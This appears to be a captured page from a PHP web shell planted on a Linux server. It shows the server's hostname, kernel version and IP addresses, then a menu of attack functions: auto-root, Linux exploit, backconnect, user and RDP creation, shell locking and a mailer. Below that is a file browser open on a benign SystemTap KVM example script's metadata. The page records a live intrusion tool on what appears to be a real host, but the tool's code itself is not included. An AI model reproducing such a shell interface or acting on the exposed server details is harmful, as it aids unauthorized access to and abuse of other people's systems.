Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
virtualization /
[ HOME SHELL ]
Name
Size
Permission
Action
kvm_service_time.meta
1.18
KB
-rw-r--r--
kvm_service_time.stp
2.71
KB
-rwxr-xr-x
kvm_service_time.txt
3.14
KB
-rw-r--r--
qemu_count.meta
623
B
-rw-r--r--
qemu_count.stp
465
B
-rwxr-xr-x
qemu_io.meta
695
B
-rw-r--r--
qemu_io.stp
781
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kvm_service_time.meta
title: Time Statistics on KVM Exit Reasons name: kvm_service_time.stp version: 1.0 author: William Cohen keywords: _best virtualization kvm subsystem: virtualization status: experimental exit: user-controlled output: sorted-list scope: system-wide description: The kvm_service_time.stp script tracks the statistics about the amount of time that the processor left the guest virtual machine for each exit reason (for example fixing up a page table or handling an IO operation). When the script exits it prints out the number of times each exit reason was encountered, the total duration of time it left the guest VM, the minimum time, the average time, and the maximum time in microseconds for that exit reason. On Linux 2.6.38 and newer kernel the script can automatically determine whether it is running on Intel or AMD processors. For older kernels with a kernel.trace("kvm_exit") tracepoint that does not have the $isa parameter you can explicitly state the kvm type with a "-G kvm=intel" or "-G kvm=amd" on the command line. test_support: stap -l 'kernel.trace("kvm_entry")' && stap -l 'kernel.trace("kvm_exit")' test_check: stap -p4 kvm_service_time.stp test_installcheck: stap kvm_service_time.stp -T 1
Close